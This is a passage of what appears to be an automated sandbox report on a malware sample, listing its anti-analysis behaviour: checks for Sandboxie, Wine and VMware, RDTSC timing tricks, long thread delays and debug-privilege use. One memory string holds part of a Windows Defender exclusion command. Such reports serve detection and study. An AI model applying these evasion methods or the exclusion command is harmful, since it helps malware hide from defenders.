          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.3321b58.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 1D4l9eR0W4.exe PID: 1476, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 1D4l9eR0W4.exe, 00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp, 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 1D4l9eR0W4.exe, 00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp, 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000003208614 second address: 000000000320861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000032089AE second address: 00000000032089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exe TID: 3480Thread sleep time: -38554s >= -30000s
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exe TID: 7012Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4780Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7084Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeThread delayed: delay time: 38554
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeThread delayed: delay time: 922337203685477
          Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.669021166.0000000004791000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.701418123.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.698171111.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.701418123.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.673852871.000000000A897000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAb
          Source: explorer.exe, 00000005.00000000.668994565.0000000004755000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.686546615.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.686700384.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.673852871.000000000A897000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01899080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01961074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01952073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0194D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01965BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01968B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01895210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0195EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01924257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01968A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_018D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
